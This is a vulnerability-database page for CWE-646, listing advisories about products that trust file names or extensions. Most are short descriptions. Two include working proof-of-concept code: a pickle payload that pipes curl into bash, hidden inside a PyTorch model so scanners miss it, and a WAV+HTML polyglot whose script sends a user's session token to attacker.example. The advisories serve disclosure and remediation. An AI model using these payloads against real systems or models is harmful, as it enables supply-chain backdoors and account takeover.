Common Weakness Enumeration

CWE-646

Allowed

Reliance on File Name or Extension of Externally-Supplied File

Abstraction: Variant · Status: Incomplete

The product allows a file to be uploaded, but it relies on the file name or extension of the file to determine the appropriate behaviors. This could be used by attackers to cause the file to be misclassified and processed in a dangerous fashion.

23 vulnerabilities reference this CWE, most recent first.

GHSA-2JP2-4GCW-39MV

Vulnerability from github – Published: 2024-11-22 04:25 – Updated: 2025-02-26 21:30
VLAI
Details

Wowza Streaming Engine below 4.9.1 permits an authenticated Streaming Engine Manager administrator to define a custom application property and poison a stream target for high-privilege remote code execution.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-52052"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-646"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-11-21T23:15:04Z",
    "severity": "CRITICAL"
  },
  "details": "Wowza Streaming Engine below 4.9.1 permits an authenticated Streaming Engine Manager administrator to define a custom application property and poison a stream target for high-privilege remote code execution.",
  "id": "GHSA-2jp2-4gcw-39mv",
  "modified": "2025-02-26T21:30:31Z",
  "published": "2024-11-22T04:25:02Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52052"
    },
    {
      "type": "WEB",
      "url": "https://www.rapid7.com/blog/post/2024/11/20/multiple-vulnerabilities-in-wowza-streaming-engine-fixed"
    },
    {
      "type": "WEB",
      "url": "https://www.wowza.com/docs/wowza-streaming-engine-4-9-1-release-notes"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-5MM3-H2F7-6J8W

Vulnerability from github – Published: 2023-03-13 21:30 – Updated: 2023-03-16 18:30
VLAI
Details

Akuvox E11 does not ensure that a file extension is associated with the file provided. This could allow an attacker to upload a file to the device by changing the extension of a malicious file to an accepted file type.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-0350"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-345",
      "CWE-646"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-03-13T21:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Akuvox E11 does not ensure that a file extension is associated with the file provided. This could allow an attacker to upload a file to the device by changing the extension of a malicious file to an accepted file type.",
  "id": "GHSA-5mm3-h2f7-6j8w",
  "modified": "2023-03-16T18:30:27Z",
  "published": "2023-03-13T21:30:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0350"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-068-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-62WX-5H4R-79P8

Vulnerability from github – Published: 2024-03-05 12:30 – Updated: 2024-03-05 12:30
VLAI
Details

A CWE-646 “Reliance on File Name or Extension of Externally-Supplied File” vulnerability in the “iec61850” functionality of the web application allows a remote authenticated attacker to upload any arbitrary type of file into the device. This issue affects: AiLux imx6 bundle below version imx6_1.0.7-2.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-45599"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-646"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-03-05T12:15:47Z",
    "severity": "MODERATE"
  },
  "details": "A CWE-646 \u201cReliance on File Name or Extension of Externally-Supplied File\u201d vulnerability in the \u201ciec61850\u201d functionality of the web application allows a remote authenticated attacker to upload any arbitrary type of file into the device. This issue affects: AiLux imx6 bundle below version imx6_1.0.7-2.",
  "id": "GHSA-62wx-5h4r-79p8",
  "modified": "2024-03-05T12:30:33Z",
  "published": "2024-03-05T12:30:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45599"
    },
    {
      "type": "WEB",
      "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2023-45599"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-769V-P64C-89PR

Vulnerability from github – Published: 2025-03-03 19:59 – Updated: 2025-03-06 14:52
VLAI
Summary
PyTorch Model Files Can Bypass Pickle Scanners via Unexpected Pickle Extensions
Details

CVE-2025-1889

Summary

Picklescan fails to detect hidden pickle files embedded in PyTorch model archives due to its reliance on file extensions for detection. This allows an attacker to embed a secondary, malicious pickle file with a non-standard extension inside a model archive, which remains undetected by picklescan but is still loaded by PyTorch's torch.load() function. This can lead to arbitrary code execution when the model is loaded.

Details

Picklescan primarily identifies pickle files by their extensions (e.g., .pkl, .pt). However, PyTorch allows specifying an alternative pickle file inside a model archive using the pickle_file parameter when calling torch.load(). This makes it possible to embed a malicious pickle file (e.g., config.p) inside the model while keeping the primary data.pkl file benign.

A typical attack works as follows:

  • A PyTorch model (model.pt) is created and saved normally.
  • A second pickle file (config.p) containing a malicious payload is crafted.
  • The data.pkl file in the model is modified to contain an object that calls torch.load(model.pt, pickle_file='config.p'), causing config.p to be loaded when the model is opened.
  • Since picklescan ignores non-standard extensions, it does not scan config.p, allowing the malicious payload to evade detection.
  • The issue is exacerbated by the fact that PyTorch models are widely shared in ML repositories and organizations, making it a potential supply-chain attack vector.

PoC

import os
import pickle
import torch
import zipfile
from functools import partial

class RemoteCodeExecution:
    def __reduce__(self):
        return os.system, ("curl -s http://localhost:8080 | bash",)

# Create a directory inside the model
os.makedirs("model", exist_ok=True)

# Create a hidden malicious pickle file
with open("model/config.p", "wb") as f:
    pickle.dump(RemoteCodeExecution(), f)

# Create a benign model
model = {}
class AutoLoad:
    def __init__(self, path, **kwargs):
        self.path = path
        self.kwargs = kwargs

    def __reduce__(self):
        # Use functools.partial to create a partially applied function
        # with torch.load and the pickle_file argument
        return partial(torch.load, self.path, **self.kwargs), ()

model['config'] = AutoLoad(model_name, pickle_file='config.p', weights_only=False)
torch.save(model, "model.pt")

# Inject the second pickle into the model archive
with zipfile.ZipFile("model.pt", "a") as archive:
    archive.write("model/config.p", "model/config.p")

# Loading the model triggers execution of config.p
torch.load("model.pt")

Impact

Severity: High

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in PyTorch models that remains undetected but executes when the model is loaded.

Potential Exploits: This vulnerability could be exploited in supply chain attacks, backdooring pre-trained models distributed via repositories like Hugging Face or PyTorch Hub.

Recommendations

  1. Scan All Files in the ZIP Archive: picklescan should analyze all files in the archive instead of relying on file extensions.
  2. Detect Hidden Pickle References: Static analysis should detect torch.load(pickle_file=...) calls inside data.pkl.
  3. Magic Byte Detection: Instead of relying on extensions, picklescan should inspect file contents for pickle magic bytes (\x80\x05).
  4. Block the following globals: - torch.load - Block functools.partial
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.0.21"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "picklescan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.22"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-1889"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-646"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-03T19:59:46Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### CVE-2025-1889\n\n### Summary\n\nPicklescan fails to detect hidden pickle files embedded in PyTorch model archives due to its reliance on file extensions for detection. This allows an attacker to embed a secondary, malicious pickle file with a non-standard extension inside a model archive, which remains undetected by picklescan but is still loaded by PyTorch\u0027s torch.load() function. This can lead to arbitrary code execution when the model is loaded.\n\n### Details\n\nPicklescan primarily identifies pickle files by their extensions (e.g., .pkl, .pt). However, PyTorch allows specifying an alternative pickle file inside a model archive using the pickle_file parameter when calling torch.load(). This makes it possible to embed a malicious pickle file (e.g., config.p) inside the model while keeping the primary data.pkl file benign.\n\nA typical attack works as follows:\n\n- A PyTorch model (model.pt) is created and saved normally.\n- A second pickle file (config.p) containing a malicious payload is crafted.\n- The data.pkl file in the model is modified to contain an object that calls torch.load(model.pt, pickle_file=\u0027config.p\u0027), causing config.p to be loaded when the model is opened.\n- Since picklescan ignores non-standard extensions, it does not scan config.p, allowing the malicious payload to evade detection.\n- The issue is exacerbated by the fact that PyTorch models are widely shared in ML repositories and organizations, making it a potential supply-chain attack vector.\n\n### PoC\n```\nimport os\nimport pickle\nimport torch\nimport zipfile\nfrom functools import partial\n\nclass RemoteCodeExecution:\n    def __reduce__(self):\n        return os.system, (\"curl -s http://localhost:8080 | bash\",)\n\n# Create a directory inside the model\nos.makedirs(\"model\", exist_ok=True)\n\n# Create a hidden malicious pickle file\nwith open(\"model/config.p\", \"wb\") as f:\n    pickle.dump(RemoteCodeExecution(), f)\n\n# Create a benign model\nmodel = {}\nclass AutoLoad:\n    def __init__(self, path, **kwargs):\n        self.path = path\n        self.kwargs = kwargs\n\n    def __reduce__(self):\n        # Use functools.partial to create a partially applied function\n        # with torch.load and the pickle_file argument\n        return partial(torch.load, self.path, **self.kwargs), ()\n\nmodel[\u0027config\u0027] = AutoLoad(model_name, pickle_file=\u0027config.p\u0027, weights_only=False)\ntorch.save(model, \"model.pt\")\n\n# Inject the second pickle into the model archive\nwith zipfile.ZipFile(\"model.pt\", \"a\") as archive:\n    archive.write(\"model/config.p\", \"model/config.p\")\n\n# Loading the model triggers execution of config.p\ntorch.load(\"model.pt\")\n```\n\n### Impact\n\nSeverity: High\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\n\nWhat is the impact? Attackers can embed malicious code in PyTorch models that remains undetected but executes when the model is loaded.\n\nPotential Exploits: This vulnerability could be exploited in supply chain attacks, backdooring pre-trained models distributed via repositories like Hugging Face or PyTorch Hub.\n\n### Recommendations\n\n1. Scan All Files in the ZIP Archive: picklescan should analyze all files in the archive instead of relying on file extensions.\n2. Detect Hidden Pickle References: Static analysis should detect torch.load(pickle_file=...) calls inside data.pkl.\n3. Magic Byte Detection: Instead of relying on extensions, picklescan should inspect file contents for pickle magic bytes (\\x80\\x05).\n4. Block the following globals:\n        - torch.load\n        - Block functools.partial",
  "id": "GHSA-769v-p64c-89pr",
  "modified": "2025-03-06T14:52:09Z",
  "published": "2025-03-03T19:59:46Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-769v-p64c-89pr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1889"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/commit/baf03faf88fece56a89534d12ce048e5ee36e50e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mmaitre314/picklescan"
    },
    {
      "type": "WEB",
      "url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1889"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "PyTorch Model Files Can Bypass Pickle Scanners via Unexpected Pickle Extensions"
}

GHSA-7W4R-XXR6-XRCJ

Vulnerability from github – Published: 2024-09-06 18:31 – Updated: 2024-09-09 18:30
VLAI
Details

SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-8517"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-646",
      "CWE-73"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-09-06T16:15:03Z",
    "severity": "CRITICAL"
  },
  "details": "SPIP before 4.3.2, 4.2.16, and \n4.1.18 is vulnerable to a command injection issue. A \nremote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.",
  "id": "GHSA-7w4r-xxr6-xrcj",
  "modified": "2024-09-09T18:30:29Z",
  "published": "2024-09-06T18:31:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8517"
    },
    {
      "type": "WEB",
      "url": "https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html"
    },
    {
      "type": "WEB",
      "url": "https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_2_a_big_upload"
    },
    {
      "type": "WEB",
      "url": "https://vozec.fr/researchs/spip-preauth-rce-2024-big-upload"
    },
    {
      "type": "WEB",
      "url": "https://vulncheck.com/advisories/spip-upload-rce"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CGP3-9H2X-R5V8

Vulnerability from github – Published: 2025-11-13 15:30 – Updated: 2025-11-13 15:30
VLAI
Details

Symlink following in the installer for the Zoom Workplace VDI Plugin macOS Universal installer before version 6.3.14, 6.4.14, and 6.5.10 in their respective tracks may allow an authenticated user to conduct a disclosure of information via network access.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-30662"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-646"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-13T15:15:51Z",
    "severity": "MODERATE"
  },
  "details": "Symlink following in the installer for the Zoom Workplace VDI Plugin macOS Universal installer before version 6.3.14, 6.4.14, and 6.5.10 in their respective tracks may allow an authenticated user to conduct a disclosure of information via network access.",
  "id": "GHSA-cgp3-9h2x-r5v8",
  "modified": "2025-11-13T15:30:31Z",
  "published": "2025-11-13T15:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30662"
    },
    {
      "type": "WEB",
      "url": "https://www.zoom.com/en/trust/security-bulletin/zsb-25045"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-HW34-RQC5-H2GM

Vulnerability from github – Published: 2025-03-03 21:30 – Updated: 2025-03-03 22:23
VLAI
Summary
Duplicate Advisory: Picklescan Allows Remote Code Execution via Malicious Pickle File Bypassing Static Analysis
Details

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-769v-p64c-89pr. This link is maintained to preserve external references.

Original Description

picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. An attacker could craft a malicious model that uses Pickle include a malicious pickle file with a non-standard file extension. Because the malicious pickle file inclusion is not considered as part of the scope of picklescan, the file would pass security checks and appear to be safe, when it could instead prove to be problematic.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "picklescan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.21"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-646",
      "CWE-807"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-03T22:23:29Z",
    "nvd_published_at": "2025-03-03T19:15:34Z",
    "severity": "MODERATE"
  },
  "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-769v-p64c-89pr. This link is maintained to preserve external references.\n\n## Original Description\npicklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. An attacker could craft a malicious model that uses Pickle include a malicious pickle file with a non-standard file extension. Because the malicious pickle file inclusion is not considered as part of the scope of picklescan, the file would pass security checks and appear to be safe, when it could instead prove to be problematic.",
  "id": "GHSA-hw34-rqc5-h2gm",
  "modified": "2025-03-03T22:23:29Z",
  "published": "2025-03-03T21:30:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1889"
    },
    {
      "type": "WEB",
      "url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1889"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Duplicate Advisory: Picklescan Allows Remote Code Execution via Malicious Pickle File Bypassing Static Analysis",
  "withdrawn": "2025-03-03T22:23:29Z"
}

GHSA-J942-4F9W-RFQH

Vulnerability from github – Published: 2025-10-22 09:30 – Updated: 2025-10-22 09:30
VLAI
Details

A low privileged remote attacker can upload arbitrary data masked as a png file to the affected device using the webserver API because only the file extension is verified.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-41720"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-646"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-22T07:15:33Z",
    "severity": "MODERATE"
  },
  "details": "A low privileged remote attacker can upload arbitrary data masked as a png file to the affected device using the webserver API because only the file extension is verified.",
  "id": "GHSA-j942-4f9w-rfqh",
  "modified": "2025-10-22T09:30:19Z",
  "published": "2025-10-22T09:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41720"
    },
    {
      "type": "WEB",
      "url": "https://sauter.csaf-tp.certvde.com/.well-known/csaf/white/2025/vde-2025-060.json"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-M8F9-9WHG-F4XR

Vulnerability from github – Published: 2026-05-14 20:17 – Updated: 2026-05-19 16:02
VLAI
Summary
Open WebUI has stored XSS via attacker-controlled file extension in /api/v1/audio/transcriptions
Details

Summary

The audio transcription upload endpoint takes the file extension from the user-supplied filename and saves the file under CACHE_DIR/audio/transcriptions/.. The /cache/{path} route serves these files via FileResponse, which sets Content-Type from the on-disk extension and emits no Content-Disposition. A verified user with the default-on chat.stt permission can upload a polyglot WAV+HTML file named pwn.html and trick any other user into opening the resulting URL — the response comes back as text/html and any embedded runs in the Open WebUI origin.

Details

Verified on main @ 8dae237a (v0.9.2):
- backend/open_webui/routers/audio.py:1244-1249 — ext = safe_name.rsplit('.', 1)[-1] from user-supplied filename, then filename = f'{id}.{ext}'. No
allowlist, no cross-check against file.content_type.
- backend/open_webui/main.py:2768-2779 — /cache/{path:path} returns FileResponse(file_path). Starlette derives Content-Type from the filename extension
and sets no Content-Disposition.
- backend/open_webui/utils/misc.py:889-921 — strict_match_mime_type defaults to ['audio/*', 'video/webm'], so Content-Type: audio/wav on the upload passes regardless of the actual body.
- backend/open_webui/config.py:1482 — USER_PERMISSIONS_CHAT_STT defaults to True.
- src/routes/+layout.svelte (lines 123, 142, 177, 528, 638, …) — JWT lives in localStorage.token, reachable from JS in the origin.
- backend/open_webui/utils/oauth.py:1736-1739 — OAuth token cookie set with httponly=False.

PoC

Tested end-to-end against a harness re-exporting the exact handlers from audio.py and main.py. The cached response was Content-Type: text/html; charset=utf-8 with no Content-Disposition. ```python import struct, httpx

data = b'\x80' * 44100
wav = struct.pack('<4sI4s4sIHHIIHH4sI', b'RIFF', 36 + len(data), b'WAVE',
b'fmt ', 16, 1, 1, 44100, 44100, 1, 8,
b'data', len(data)) + data
payload = wav + b'alert(document.domain);fetch("https://attacker.example/x?t="+localStorage.token)'

r = httpx.post(
'https://VICTIM/api/v1/audio/transcriptions',
headers={'Authorization': f'Bearer {ATTACKER_JWT}'},
files={'file': ('pwn.html', payload, 'audio/wav')},
)
fn = r.json()['filename'] # '.html' #Send victim to: https://VICTIM/cache/audio/transcriptions/
```

https://github.com/user-attachments/assets/c263bfcd-b923-4891-9c2f-a01c1faa6408

Impact

Authenticated stored XSS in the Open WebUI origin, exploitable by any verified user with the default-on chat.stt permission. Triggered by a single click from any other authenticated user. Leads to session-token theft (JWT lives in localStorage and the OAuth cookie is non-HttpOnly), enabling full account takeover of any user — including admins. With an admin token, in-process code execution on the server is theoretically reachable through Open WebUI's existing admin-only plugin mechanism, but that path is out of scope for this report.

Affected: <= 0.9.2.

Suggested fixes (any one breaks the chain): derive the saved extension from the validated MIME against a fixed audio allowlist; on /cache, force
Content-Disposition: attachment and X-Content-Type-Options: nosniff (or restrict served extensions); move JWT to an HttpOnly; SameSite=Lax cookie.

Workaround: set USER_PERMISSIONS_CHAT_STT=False to revoke the upload right from non-admins.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.9.2"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45315"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-434",
      "CWE-646",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T20:17:58Z",
    "nvd_published_at": "2026-05-15T22:16:54Z",
    "severity": "HIGH"
  },
  "details": "## Summary                                                                                                                                                \n\n  The audio transcription upload endpoint takes the file extension from the user-supplied filename and saves the file under CACHE_DIR/audio/transcriptions/\u003cuuid\u003e.\u003cext\u003e. The /cache/{path} route serves these files via FileResponse, which sets Content-Type from the on-disk extension and emits no Content-Disposition. A verified user with the default-on chat.stt permission can upload a polyglot WAV+HTML file named pwn.html and trick any other user into opening the resulting URL \u2014 the response comes back as text/html and any embedded \u003cscript\u003e runs in the Open WebUI origin.\n\n## Details\n  Verified on main @ 8dae237a (v0.9.2):                                                                                                       \n  - backend/open_webui/routers/audio.py:1244-1249 \u2014 ext = safe_name.rsplit(\u0027.\u0027, 1)[-1] from user-supplied filename, then filename = f\u0027{id}.{ext}\u0027. No      \n  allowlist, no cross-check against file.content_type.                                                                                                   \n  - backend/open_webui/main.py:2768-2779 \u2014 /cache/{path:path} returns FileResponse(file_path). Starlette derives Content-Type from the filename extension  \n  and sets no Content-Disposition.                                                                                                                         \n  - backend/open_webui/utils/misc.py:889-921 \u2014 strict_match_mime_type defaults to [\u0027audio/*\u0027, \u0027video/webm\u0027], so Content-Type: audio/wav on the upload\n  passes regardless of the actual body.                                                                                                                    \n  - backend/open_webui/config.py:1482 \u2014 USER_PERMISSIONS_CHAT_STT defaults to True.                                                                      \n  - src/routes/+layout.svelte (lines 123, 142, 177, 528, 638, \u2026) \u2014 JWT lives in localStorage.token, reachable from JS in the origin.                       \n  - backend/open_webui/utils/oauth.py:1736-1739 \u2014 OAuth token cookie set with httponly=False.                                                              \n                                                                                                                                                           \n##  PoC                                                                                                                                                      \n                                                                                                                                                           \n  Tested end-to-end against a harness re-exporting the exact handlers from audio.py and main.py. The cached response was \n  Content-Type: text/html; charset=utf-8 with no Content-Disposition.\n  ```python\n  import struct, httpx                                                                                                                                   \n\n  data = b\u0027\\x80\u0027 * 44100                                                                                                                                   \n  wav  = struct.pack(\u0027\u003c4sI4s4sIHHIIHH4sI\u0027,\n          b\u0027RIFF\u0027, 36 + len(data), b\u0027WAVE\u0027,                                                                                                                \n          b\u0027fmt \u0027, 16, 1, 1, 44100, 44100, 1, 8,                                                                                                         \n          b\u0027data\u0027, len(data)) + data                                                                                                                       \n  payload = wav + b\u0027\u003cscript\u003ealert(document.domain);fetch(\"https://attacker.example/x?t=\"+localStorage.token)\u003c/script\u003e\u0027\n                      \n                                                                                                                                                           \n  r = httpx.post(                                                                                                                                          \n      \u0027https://VICTIM/api/v1/audio/transcriptions\u0027,                                                                                                        \n      headers={\u0027Authorization\u0027: f\u0027Bearer {ATTACKER_JWT}\u0027},                                                                                                 \n      files={\u0027file\u0027: (\u0027pwn.html\u0027, payload, \u0027audio/wav\u0027)},                                                                                                  \n  )                                                                                                                                                        \n  fn = r.json()[\u0027filename\u0027]      # \u0027\u003cuuid\u003e.html\u0027\n #Send victim to: https://VICTIM/cache/audio/transcriptions/\u003cfn\u003e                                                                 \n```\n\n\nhttps://github.com/user-attachments/assets/c263bfcd-b923-4891-9c2f-a01c1faa6408\n\n\n\n                                                                                                                                        \n##  Impact                                                                                                                                                   \n                                                                                                                                                           \n  Authenticated stored XSS in the Open WebUI origin, exploitable by any verified user with the default-on chat.stt permission. Triggered by a single click from any other authenticated user. Leads to session-token theft (JWT lives in localStorage and the OAuth cookie is non-HttpOnly), enabling full account takeover of any user \u2014 including admins. With an admin token, in-process code execution on the server is theoretically reachable through Open WebUI\u0027s existing admin-only plugin mechanism, but that path is out of scope for this report.                                                                   \n\n  Affected: \u003c= 0.9.2.\n\n  Suggested fixes (any one breaks the chain): derive the saved extension from the validated MIME against a fixed audio allowlist; on /cache, force         \n  Content-Disposition: attachment and X-Content-Type-Options: nosniff (or restrict served extensions); move JWT to an HttpOnly; SameSite=Lax cookie.\n                                                                                                                                                           \n  Workaround: set USER_PERMISSIONS_CHAT_STT=False to revoke the upload right from non-admins.",
  "id": "GHSA-m8f9-9whg-f4xr",
  "modified": "2026-05-19T16:02:01Z",
  "published": "2026-05-14T20:17:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-m8f9-9whg-f4xr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45315"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/releases/tag/v0.9.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI has stored XSS via attacker-controlled file extension in /api/v1/audio/transcriptions"
}

GHSA-P8CQ-42F6-5Q3J

Vulnerability from github – Published: 2024-07-30 09:32 – Updated: 2024-09-07 00:31
VLAI
Details

Matrix Tafnit v8

CWE-646: Reliance on File Name or Extension of Externally-Supplied File

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-38432"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-345",
      "CWE-646"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-30T09:15:03Z",
    "severity": "MODERATE"
  },
  "details": "Matrix\u00a0Tafnit v8\n\n - \n\n\n\nCWE-646: Reliance on File Name or Extension of Externally-Supplied File",
  "id": "GHSA-p8cq-42f6-5q3j",
  "modified": "2024-09-07T00:31:28Z",
  "published": "2024-07-30T09:32:09Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38432"
    },
    {
      "type": "WEB",
      "url": "https://www.gov.il/en/Departments/faq/cve_advisories"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Make decisions on the server side based on file content and not on file name or extension.

CAPEC-209: XSS Using MIME Type Mismatch

An adversary creates a file with scripting content but where the specified MIME type of the file is such that scripting is not expected. The adversary tricks the victim into accessing a URL that responds with the script file. Some browsers will detect that the specified MIME type of the file does not match the actual type of its content and will automatically switch to using an interpreter for the real content type. If the browser does not invoke script filters before doing this, the adversary's script may run on the target unsanitized, possibly revealing the victim's cookies or executing arbitrary script in their browser.